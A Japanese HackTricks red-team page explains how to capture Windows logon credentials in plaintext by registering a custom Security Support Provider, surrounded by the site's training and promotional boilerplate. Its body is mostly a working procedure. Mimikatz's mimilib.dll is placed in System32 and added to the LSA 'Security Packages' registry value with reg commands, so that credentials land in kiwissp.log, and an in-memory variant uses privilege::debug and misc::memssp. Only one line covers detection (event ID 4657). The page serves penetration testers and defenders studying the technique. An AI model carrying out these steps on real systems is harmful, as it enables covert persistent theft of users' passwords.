Custom SSP
Tip
AWS Hackingを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hackingを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Az Hackingを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Trainingの全カタログ を閲覧して、評価トラック(ARTA/GRTA/AzRTA)と Linux Hacking Expert (LHE) を確認してください。
HackTricksをサポート
- subscription plans を確認してください!
- 💬 Discord group、telegram group に参加し、X/Twitterで @hacktricks_live をフォローするか、LinkedIn page と YouTube channel を確認してください。
- HackTricks と HackTricks Cloud の github repos に PR を送信して hacking tricks を共有してください。
Custom SSP
SSP(セキュリティサポートプロバイダー)についてはこちらで学んでください。
自分のSSPを作成して、マシンにアクセスするために使用される資格情報を平文でキャプチャできます。
Mimilib
Mimikatzが提供するmimilib.dllバイナリを使用できます。これにより、すべての資格情報が平文でファイルに記録されます。
dllをC:\Windows\System32\に配置します。
既存のLSAセキュリティパッケージのリストを取得します:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
mimilib.dllをセキュリティサポートプロバイダーリスト(セキュリティパッケージ)に追加します:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
再起動後、すべての資格情報は C:\Windows\System32\kiwissp.log に平文で見つけることができます。
メモリ内
Mimikatzを使用して、これをメモリ内に直接注入することもできます(少し不安定で動作しない可能性があることに注意してください):
privilege::debug
misc::memssp
この変更は再起動後に持続しません。
緩和策
イベント ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages の監査作成/変更
Tip
AWS Hackingを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hackingを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Az Hackingを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Trainingの全カタログ を閲覧して、評価トラック(ARTA/GRTA/AzRTA)と Linux Hacking Expert (LHE) を確認してください。
HackTricksをサポート
- subscription plans を確認してください!
- 💬 Discord group、telegram group に参加し、X/Twitterで @hacktricks_live をフォローするか、LinkedIn page と YouTube channel を確認してください。
- HackTricks と HackTricks Cloud の github repos に PR を送信して hacking tricks を共有してください。


